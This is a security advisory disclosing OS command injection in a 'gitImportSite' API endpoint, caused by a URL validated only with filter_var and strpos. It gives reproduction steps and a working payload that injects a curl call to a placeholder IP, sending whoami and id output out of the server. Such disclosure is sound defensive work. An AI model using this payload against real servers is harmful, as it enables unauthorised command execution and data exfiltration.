GHSA-g4cf-pp4x-hqgw

Summary

The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’setremote’ function later passes this input into ’procopen’, yielding OS command injection.

Details

The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection.

Affected Resources

• Operations.php:2103 gitImportSite() • \<domain\>/\<user\>/system/api/gitImportSite

PoC

To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').

1. Start a webserver.

2. Initiate a request to the ’archiveSite’ endpoint.

3. Capture and modify the request in BurpSuite.

4. Observe command output in the HTTP request from the server.

Command Injection Payload

http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef

Impact

An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.